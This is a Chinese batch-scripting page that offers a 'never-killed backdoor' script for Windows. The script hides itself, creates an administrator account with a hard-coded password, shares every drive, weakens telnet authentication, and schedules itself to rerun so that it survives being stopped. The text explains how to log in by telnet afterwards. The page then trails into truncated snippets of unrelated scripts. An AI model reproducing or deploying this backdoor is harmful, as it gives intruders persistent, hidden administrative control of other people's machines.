批处理bat之永不被杀的后门
代码如下:
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:WINNTSYSTEM32log.bat > c:WINNTSYSTEM32xyt.bat
@echo at 23:00 c:WINNTSYSTEM32log.bat >> c:WINNTSYSTEM32xyt.bat
@at 11:05 c:WINNTSYSTEM32xyt.bat
@at 23:05 c:WINNTSYSTEM32xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。
Emeditor与dos(cmd)经典使用技巧之批量生成网页
index.html@首页yhtc.html@特惠套餐ymzc.html@域名注册xnzj.html@虚拟主机fwqtg.html@服务器托管fwqzy.html@服务器租用wzjs.html@网站建设qyyj.html@企业邮局dbicp.html@代办ICPf
批处理之家发现的用批处理实现的系统类应用代码
批处理之家发现的用批处理实现的系统类应用代码比如菜单的排序,就用到不一样的方法还有输出的方式等......大家用了就知道写的不好。还请大家多
bat实现的模仿黑客帝国里面的数码雨
::黑客帝国里数码雨@echo%dbg%off::Codebyredtek2006-11-2CMD@XP::出处:http://www.cn-dos.net/forum/viewthread.php?tid=24418setlocalENABLEDELAYEDEXPANSIONmodeconcols=80lines=30clsset退格=
